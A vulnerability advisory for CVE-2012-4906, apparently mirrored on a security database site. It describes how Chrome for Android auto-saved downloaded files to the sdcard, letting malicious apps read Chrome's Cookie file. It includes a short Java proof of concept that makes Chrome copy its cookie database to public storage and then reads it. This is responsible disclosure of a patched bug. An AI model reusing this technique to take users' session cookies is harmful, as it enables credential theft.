Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28939
HistoryJan 10, 2013 - 12:00 a.m.

Chrome for Android - Download Function Information Disclosure

2013-01-1000:00:00
vulners.com
24
JSON

CVE Number: CVE-2012-4906
Title: Chrome for Android - Download Function Information Disclosure
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 was released which fixes this vulnerability

Overview:
Rogue Android apps can steal private information such as Cookie file of Chrome,
by abusing automatic download functionality of Chrome for Android.

Details:
When Chrome for Android (v18.0.1025123) loads non-renderable contents such as
binary files, Chrome for Android automatically saves them in public place (sdcard)
without asking the users whether they wish to do so or not.

Therefore, malicious Android apps can steal such contents by below method.

  1. A malicious app forces Chrome to load such contents.
  2. Chrome automatically save it to sdcard.
  3. The malicious app read the downloaded file in sdcard.

By this method, malicious apps can gain access to both local contents such as
the Cookie file of Chrome, and possibly online contents.

Such behaivior of Chrome does not matter in PC world, but it does in Android
world, because they are different in security model.

Proof of Concept:
// This is a part of malicious Android app.
public void attack() {
try {
// let Chrome app load its Cookies file, so that Chrome app
// automatically save it to /sdcard/Download/ directory.
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
intent.setData(Uri.parse("file:///data/data/com.android.chrome/app_chrome/Default/Cookies"));
startActivity(intent);

  // wait a few seconds
  Thread.sleep(3000);

  // read the Cookie file (/sdcard/Download/Cookies.bin)
  FileInputStream fis = new FileInputStream("/sdcard/Download/Cookies.bin");
  ...

}

Timeline:
2012/07/07 Reported to Google security team
2012/08/25 Re-reported to Chrome security team
2012/09/12 Vender announced v18.0.1025308
2013/01/07 Disclosure of this advisory

Recommendation:
Upgrade to the latest version.

Reference:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=144820

Related

packetstorm 1
prion 2
debiancve 2
cve 2
ubuntucve 2
securityvulns 1
packetstorm
packetstorm
Chrome For Android Download Function Information Disclosure
2013-01-08 00:00:00
prion
prion
Design/Logic Flaw
2012-09-13 20:55:00
Design/Logic Flaw
2012-09-13 20:55:00
debiancve
debiancve
CVE-2012-4903
2012-09-13 20:55:00
CVE-2012-4906
2012-09-13 20:55:00
cve
cve
CVE-2012-4903
2012-09-13 20:55:00
CVE-2012-4906
2012-09-13 20:55:00
ubuntucve
ubuntucve
CVE-2012-4906
2012-09-13 00:00:00
CVE-2012-4903
2012-09-13 00:00:00
securityvulns
securityvulns
Google Chrome for Android multiple security vulnerabilities
2013-01-10 00:00:00
JSON
Related for SECURITYVULNS:DOC:28939
packetstorm1prion2debiancve2cve2ubuntucve2securityvulns1